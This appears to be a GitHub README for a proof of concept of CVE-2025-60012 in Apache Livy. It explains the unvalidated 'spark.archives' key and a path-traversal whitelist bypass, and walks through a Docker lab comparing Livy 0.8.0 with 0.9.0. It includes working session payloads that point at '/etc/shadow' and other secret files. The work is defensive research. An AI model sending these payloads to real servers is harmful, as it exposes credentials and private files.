sid6224/CVE-2025-60012-POC

GitHub: sid6224/CVE-2025-60012-POC

针对 Apache Livy 未授权文件访问漏洞（CVE-2025-60012）的概念验证项目，含完整 Docker 环境和攻击演示脚本。

Stars: 0 | Forks: 0

# CVE-2025-60012 — Apache Livy 未授权文件访问 ## 概述 | 字段 | 详情 | |--------------|--------| | CVE ID | CVE-2025-60012 | | 严重程度 | 中危 (CVSS 6.3) | | 受影响版本 | Apache Livy 0.7.0-incubating, 0.8.0-incubating — 当连接到 Apache Spark 3.1 或更高版本时 | | 修复版本 | Apache Livy 0.9.0-incubating | | CWE | CWE-20: 输入验证不恰当 | | 披露日期 | 2026-03-13 | | 报告者 | Furue Hideyuki | ## 漏洞描述拥有 Livy REST 或 JDBC 接口访问权限的已认证用户可以提交带有精心构造配置值的 Spark 会话或批处理作业。两个缺陷结合在一起，允许攻击者引用其允许路径之外的本地文件系统文件： 1. **缺少对 `spark.archives` 的验证** — Spark 3.1 引入了 `spark.archives` 作为一种跨所有集群管理器分发归档文件的统一方式。Livy 0.8.0 中经过路径验证的配置键硬编码列表（`HARDCODED_SPARK_FILE_LISTS`）不包含 `spark.archives`。因此，通过此键传递的路径永远不会根据本地文件系统白名单（`livy.file.local-dir-whitelist`）进行检查，从而允许攻击者引用任何本地文件。 2. **白名单检查中的路径遍历绕过** — 即使对于经过验证的配置键， Livy 0.8.0 中的白名单比较也使用普通 Java String `startsWith` 调用处理原始路径。攻击者可以使用路径遍历绕过此检查： `/whitelisted/dir/../../etc/passwd` 通过了字符串检查，但解析到了允许目录之外。 ## 受影响的源文件 ### 文件 1 — `LivyConf.scala` **易受攻击 (v0.8.0):** https://github.com/apache/incubator-livy/blob/v0.8.0-incubating/server/src/main/scala/org/apache/livy/LivyConf.scala **已修复 (v0.9.0):** https://github.com/apache/incubator-livy/blob/v0.9.0-incubating/server/src/main/scala/org/apache/livy/LivyConf.scala ### 文件 2 — `Session.scala` **易受攻击 (v0.8.0):** https://github.com/apache/incubator-livy/blob/v0.8.0-incubating/server/src/main/scala/org/apache/livy/sessions/Session.scala **已修复 (v0.9.0):** https://github.com/apache/incubator-livy/blob/v0.9.0-incubating/server/src/main/scala/org/apache/livy/sessions/Session.scala ## 源代码 — 克隆命令这两个版本都是使用以下确切命令直接从官方 Apache Livy GitHub 仓库克隆到此工作区的： **仓库:** https://github.com/apache/incubator-livy ``` # 易受攻击版本 — 克隆到 ./livy-0.8.0/ git clone --depth=1 --branch v0.8.0-incubating \ https://github.com/apache/incubator-livy \ livy-0.8.0 # 已修复版本 — 克隆到 ./livy-0.9.0/ git clone --depth=1 --branch v0.9.0-incubating \ https://github.com/apache/incubator-livy \ livy-0.9.0 ``` | 版本 | 标签 | 解析的提交 | 本地路径 | |---------|-----|-----------------|------------| | 0.8.0-incubating | `v0.8.0-incubating` | `78b512658e4baf1183f2b352203ada1928d8111a` | `./livy-0.8.0/` | | 0.9.0-incubating | `v0.9.0-incubating` | `7215f209b25b96488189567807eaded00953a492` | `./livy-0.9.0/` | ## 确切代码差异差异是通过在本地克隆两个标签（见上文）并运行以下命令生成的： ``` diff -u livy-0.8.0/server/src/main/scala/org/apache/livy/LivyConf.scala \ livy-0.9.0/server/src/main/scala/org/apache/livy/LivyConf.scala diff -u livy-0.8.0/server/src/main/scala/org/apache/livy/sessions/Session.scala \ livy-0.9.0/server/src/main/scala/org/apache/livy/sessions/Session.scala ``` ### 修复 1 — `LivyConf.scala`: `spark.archives` 已添加到硬编码文件列表 ``` private val HARDCODED_SPARK_FILE_LISTS = Seq( SPARK_JARS, SPARK_FILES, SPARK_ARCHIVES, SPARK_PY_FILES, + "spark.archives", // <-- ADDED in v0.9.0 (Spark 3.1+ config key) "spark.yarn.archive", "spark.yarn.dist.files", "spark.yarn.dist.jars", "spark.yarn.jar", "spark.yarn.jars" ) ``` **v0.8.0 中缺少条目的影响:** 当用户提交包含 `conf: {"spark.archives": "file:///etc/passwd"}` 的会话时，Livy 0.8.0 永远不会对该值调用 `resolveURIs()`，也永远不会根据 `livy.file.local-dir-whitelist` 对其进行检查。该路径在未经验证的情况下转发给 Spark。 ### 修复 2 — `Session.scala`: 白名单检查前的路径规范化 ``` def resolveURI(uri: URI, livyConf: LivyConf): URI = { ... if (resolved.getScheme() == "file") { - require(livyConf.localFsWhitelist.find(resolved.getPath().startsWith).isDefined, + require(livyConf.localFsWhitelist.find( + Paths.get(resolved.getPath()).normalize.startsWith).isDefined, s"Local path ${uri.getPath()} cannot be added to user sessions.") } } ``` **v0.8.0 中的影响:** 原始字符串 `startsWith` 检查可以被路径遍历载荷绕过。示例：如果 `livy.file.local-dir-whitelist = /opt/safe-data` ``` /opt/safe-data/../../../etc/passwd ``` - v0.8.0: `"/opt/safe-data/../../../etc/passwd".startsWith("/opt/safe-data")` → **true** (被绕过) - v0.9.0: `Paths.get("/opt/safe-data/../../../etc/passwd").normalize` → `/etc/passwd` `/etc/passwd`.startsWith(`/opt/safe-data`) → **false** (被阻止) ## 攻击向量摘要 ``` Attacker (authenticated REST/JDBC user) │ ▼ POST /sessions (or /batches) { "conf": { "spark.archives": "file:///etc/shadow" ← Attack 1: unvalidated Spark 3.1 key "spark.jars": "file:///safe/../etc/shadow" ← Attack 2: path traversal bypass } } │ ▼ Livy 0.8.0 — validation skipped / bypassed │ ▼ Spark reads the file and distributes it to executors │ ▼ Attacker retrieves file contents via job output / logs ``` ## 测试环境此 PoC 中的所有步骤均在以下系统上执行并验证： | 组件 | 详情 | |-----------|--------| | 主机 OS | Ubuntu 24.04.4 LTS (Noble Numbat) | | 内核 | 6.17.0-14-generic x86\_64 | | 架构 | x86\_64 | | 总内存 | 15.49 GiB | | Docker Engine | 28.2.2 | | 主机 JDK | OpenJDK 17.0.18 (仅限主机使用 — 容器使用 eclipse-temurin:11-jdk-focal) | | 容器基础镜像 | eclipse-temurin:11-jdk-focal (JDK 11, Ubuntu Focal) | | Spark 版本 (两个镜像) | 3.1.3 with Hadoop 3.2 | | Livy 版本 — 易受攻击镜像 | 0.8.0-incubating (Scala 2.12 build) | | Livy 版本 — 已修复镜像 | 0.9.0-incubating (Scala 2.12 build) | ## 概念验证 ### 概述 ``` docker/vulnerable/ → image: cve-2025-60012-vulnerable (Livy 0.8.0 + Spark 3.1.3) docker/fixed/ → image: cve-2025-60012-fixed (Livy 0.9.0 + Spark 3.1.3) test/validate.sh → single script, run unchanged against both environments ``` 完整的端到端序列 — 按顺序执行步骤 1 至 4： ``` Step 1: Build vulnerable image → start container → verify Livy is up Step 2: Run validate.sh → confirm VULNERABLE (both attacks HTTP 201) → stop container Step 3: Build fixed image → start container → verify Livy is up Step 4: Run validate.sh → confirm FIXED (both attacks HTTP 400) → stop container ``` ### 步骤 1 — 构建并启动易受攻击的环境 (Livy 0.8.0 + Spark 3.1.3) **文件:** - `docker/vulnerable/Dockerfile` — eclipse-temurin:11-jdk-focal, Spark 3.1.3, Livy 0.8.0-incubating - `docker/vulnerable/livy.conf` — 绑定在 `0.0.0.0:8998`，本地模式，白名单 = `/opt/safe-data` **1a. 构建镜像:** ``` docker build -t cve-2025-60012-vulnerable docker/vulnerable/ ``` **验证 — 镜像已创建:** ``` docker images cve-2025-60012-vulnerable ``` 预期输出: ``` REPOSITORY TAG IMAGE ID CREATED SIZE cve-2025-60012-vulnerable latest ``` **1b. 启动容器:** ``` docker run -d --name livy-vulnerable -p 8998:8998 cve-2025-60012-vulnerable ``` **验证 — 容器正在运行:** ``` docker ps --filter name=livy-vulnerable ``` 预期输出: ``` CONTAINER ID IMAGE COMMAND STATUS PORTS cve-2025-60012-vulnerable "livy-server" Up X seconds 0.0.0.0:8998->8998/tcp ``` **1c. 等待 Livy 启动，然后验证 REST API:** ``` sleep 20 curl -s http://localhost:8998/sessions ``` 预期输出: ``` {"from":0,"total":0,"sessions":[]} ``` **1d. 验证容器内的目录布局:** 确认白名单内的安全文件存在: ``` docker exec livy-vulnerable cat /opt/safe-data/safe.txt ``` 预期输出: ``` This file lives inside the whitelisted directory. ``` 确认目标敏感文件存在于白名单之外: ``` docker exec livy-vulnerable cat /opt/sensitive/secret.txt ``` 预期输出: ``` SECRET_KEY=abcdef1234567890 DB_PASSWORD=SuperSecret! ``` ### 步骤 2 — 对易受攻击的环境运行验证 **`test/validate.sh` 测试内容:** | # | 攻击 | 载荷键 | Livy 0.8.0 上的预期结果 | |---|--------|-------------|-------------------------------| | 1 | `spark.archives` 缺失自 `LivyConf.scala` 中的 `HARDCODED_SPARK_FILE_LISTS` | `spark.archives` | HTTP 201 — 路径在未经验证的情况下被接受 | | 2 | 通过 `Session.scala` 中的 `String.startsWith()` 进行路径遍历 | `spark.jars` with `../` traversal | HTTP 201 — 遍历绕过白名单 | **2a. 运行脚本:** ``` bash test/validate.sh ``` **预期输出:** ``` TEST : Attack 1 — spark.archives (unvalidated Spark 3.1+ key) WHAT : spark.archives path to /opt/sensitive/secret.txt (outside whitelist /opt/safe-data) PAYLOAD : {"kind":"spark","conf":{"spark.archives":"file:///opt/sensitive/secret.txt"}} HTTP CODE : 201 RESPONSE : {"id":0,...,"conf":{"spark.archives":"file:///opt/sensitive/secret.txt"},...} [VULNERABLE] Livy ACCEPTED the request (HTTP 201). Path was NOT validated — attack vector is open. TEST : Attack 2 — path traversal via spark.jars (String.startsWith bypass) WHAT : spark.jars path using '../' to escape /opt/safe-data whitelist PAYLOAD : {"kind":"spark","conf":{"spark.jars":"file:///opt/safe-data/../sensitive/secret.txt"}} HTTP CODE : 201 RESPONSE : {"id":1,...,"conf":{"spark.jars":"file:///opt/safe-data/../sensitive/secret.txt"},...} [VULNERABLE] Livy ACCEPTED the request (HTTP 201). Path was NOT validated — attack vector is open. RESULT: VULNERABLE — exit code 1 ``` **2b. 停止并移除易受攻击的容器:** ``` docker stop livy-vulnerable && docker rm livy-vulnerable ``` **验证 — 容器已完全移除:** ``` docker ps -a --filter name=livy-vulnerable ``` 预期输出 (空 — 无行): ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ``` ### 步骤 3 — 构建并启动已修复的环境 (Livy 0.9.0 + Spark 3.1.3) **文件:** - `docker/fixed/Dockerfile` — 相同的基础镜像和 Spark 3.1.3，仅 Livy 版本更改为 0.9.0 - `docker/fixed/livy.conf` — 与 `docker/vulnerable/livy.conf` 相同（相同的白名单、端口、模式） **3a. 构建镜像:** ``` docker build -t cve-2025-60012-fixed docker/fixed/ ``` **验证 — 镜像已创建:** ``` docker images cve-2025-60012-fixed ``` 预期输出: ``` REPOSITORY TAG IMAGE ID CREATED SIZE cve-2025-60012-fixed latest ``` **3b. 启动容器:** ``` docker run -d --name livy-fixed -p 8998:8998 cve-2025-60012-fixed ``` **验证 — 容器正在运行:** ``` docker ps --filter name=livy-fixed ``` 预期输出: ``` CONTAINER ID IMAGE COMMAND STATUS PORTS cve-2025-60012-fixed "livy-server" Up X seconds 0.0.0.0:8998->8998/tcp ``` **3c. 等待 Livy 启动，然后验证 REST API:** ``` sleep 20 curl -s http://localhost:8998/sessions ``` 预期输出: ``` {"from":0,"total":0,"sessions":[]} ``` ### 步骤 4 — 对已修复的环境运行相同的验证 **步骤 2 和步骤 4 之间的变化:** - 相同的载荷，相同的脚本 - Livy 0.9.0 现在通过 `HARDCODED_SPARK_FILE_LISTS` 验证 `spark.archives` - Livy 0.9.0 现在在白名单检查之前使用 `Paths.get().normalize()` 规范化路径 - 两次攻击都在创建会话之前以 HTTP 400 被拒绝 **4a. 运行脚本:** ``` bash test/validate.sh ``` **预期输出:** ``` TEST : Attack 1 — spark.archives (unvalidated Spark 3.1+ key) WHAT : spark.archives path to /opt/sensitive/secret.txt (outside whitelist /opt/safe-data) PAYLOAD : {"kind":"spark","conf":{"spark.archives":"file:///opt/sensitive/secret.txt"}} HTTP CODE : 400 RESPONSE : {"msg":"Rejected, Reason: requirement failed: Local path /opt/sensitive/secret.txt cannot be added to user sessions."} [FIXED] Livy REJECTED the request (HTTP 400). Path validation blocked the payload. TEST : Attack 2 — path traversal via spark.jars (String.startsWith bypass) WHAT : spark.jars path using '../' to escape /opt/safe-data whitelist PAYLOAD : {"kind":"spark","conf":{"spark.jars":"file:///opt/safe-data/../sensitive/secret.txt"}} HTTP CODE : 400 RESPONSE : {"msg":"Rejected, Reason: requirement failed: Local path /opt/safe-data/../sensitive/secret.txt cannot be added to user sessions."} [FIXED] Livy REJECTED the request (HTTP 400). Path validation blocked the payload. RESULT: FIXED — exit code 0 ``` **错误消息确认的内容:** | 攻击 | HTTP | 错误消息 | 已修复的根本原因 | |--------|------|---------------|-----------------| | 1 — `spark.archives` | 400 | `Local path /opt/sensitive/secret.txt cannot be added to user sessions.` | `spark.archives` 已添加到 `LivyConf.scala` 中的 `HARDCODED_SPARK_FILE_LISTS`；路径现在会经过 `resolveURI()` 白名单检查 | | 2 — 路径遍历 | 400 | `Local path /opt/safe-data/../sensitive/secret.txt cannot be added to user sessions.` | `Session.scala` 中添加了 `Paths.get(...).normalize()`；在白名单比较之前解析 `../` | **4b. 停止并移除已修复的容器:** ``` docker stop livy-fixed && docker rm livy-fixed ``` **验证 — 容器已完全移除:** ``` docker ps -a --filter name=livy-fixed ``` 预期输出 (空 — 无行): ``` CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES ``` ## 推论 CVE-2025-60012 表明，漏洞并不总是需要绕过安全控制 —— 有时只需找到一条从未经过该控制的路由就足够了。白名单（`livy.file.local-dir-whitelist`）在 Livy 0.8.0 和 0.9.0 中都存在，并且在两个环境中都配置正确。故障发生在其上游： 1. **注册缺失（攻击 1）：** `spark.archives` 在 Spark 3.1 中作为 `spark.yarn.dist.archives` 的集群管理器无关替代方案被引入。Livy 内部的配置键列表（其路径被送入白名单检查，位于 `LivyConf.scala` 的 `HARDCODED_SPARK_FILE_LISTS` 中）从未更新以包含它。因此，通过 `spark.archives` 传递的任何路径都在完全未经验证的情况下转发给 Spark。白名单从未被查询。 2. **检查本身的逻辑缺陷（攻击 2）：** 对于已注册的键，`Session.scala` 中的白名单比较在原始路径字符串上使用 Java 的 `String.startsWith()`。这对文件系统路径比较是不够的，因为它没有考虑 `..` 遍历。像 `/opt/safe-data/../sensitive/secret.txt` 这样的路径满足了针对白名单条目 `/opt/safe-data` 的字符串检查，但解析到了完全位于其之外的位置。综上所述，这两个弱点意味着拥有已认证用户权限 —— 除了访问 Livy REST 或 JDBC 接口外没有特殊权限 —— 可以引用 Livy 服务器主机上的任意本地文件。在共享分析集群中，这可能导致凭据、密钥、配置或任何可被 Livy 进程用户读取的数据泄露。 0.9.0 中的修复是极简且有针对性的：向 `HARDCODED_SPARK_FILE_LISTS` 添加了一行（关闭注册缺口），并在白名单比较之前添加了一次 `Paths.get().normalize()` 调用（关闭遍历绕过）。这两个更改都没有改变白名单本身，证实了白名单从来都不是问题 —— 问题在于输入它的代码不完整且不精确。 **防御者的关键结论：** 当 Livy 与 Spark 3.1 或更高版本一起部署时，升级到 Livy 0.9.0-incubating 是唯一完整的补救措施。仅收紧 `livy.file.local-dir-whitelist` 不足以防御攻击 1，因为在易受攻击的版本中，通过 `spark.archives` 提交的路径会完全绕过该检查。 ## 参考文献 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-60012 - OSS-Sec 披露: http://www.openwall.com/lists/oss-security/2026/03/12/1 - Apache 邮件列表: https://lists.apache.org/thread/gpc85fwrgrbglpk9gm8tmcjzqnctx64w - Apache Livy 项目: https://livy.apache.org/ ## 致谢 - **Furue Hideyuki** — CVE-2025-60012 向 Apache 安全团队的原始报告者。 - **Apache Livy 维护者** — 感谢在 v0.9.0-incubating 中的及时分类和针对性修复。 - **Apache 安全团队** — 感谢协调负责任的披露流程。 - **OSS-Sec 社区** — 感谢公开披露线程使独立分析成为可能。 ## 贡献欢迎贡献以改进此 PoC 或文档！请确保任何贡献： - 遵循负责任的披露实践 - 包含适当的免责声明 - 除了教育演示外，不包含恶意代码 - 保持以教育价值为核心要做出贡献，请提交 Pull Request 或提交一个描述提议更改的 Issue。 ## 许可证本项目根据 [MIT 许可证](LICENSE) 授权。 ## 免责声明此仓库仅用于教育和安全研究目的。概念验证演示漏洞机制以帮助理解和制定防御措施。请勿针对您不拥有或未获得明确书面测试许可的系统使用。 ## 标签 `cve-2025-60012` `apache-livy` `apache-spark` `path-traversal` `unauthorized-file-access` `cwe-20` `improper-input-validation` `spark-archives` `livy-0.8.0` `livy-0.9.0` `security-research` `proof-of-concept` `docker` `java` `scala` `vulnerability-analysis` `whitelist-bypass` `file-disclosure` `rest-api-security`

标签：Apache Livy, Apache Spark, CVE-2025-60012, CVSS 6.3, CWE-20, GHAS, Java安全, JS文件枚举, POC验证, SDLC, 中间件漏洞, 任意文件读取, 大数据安全, 应用安全, 文件读取漏洞, 未授权访问, 消息认证码, 白名单绕过, 网络安全审计, 请求拦截, 路径遍历, 输入验证绕过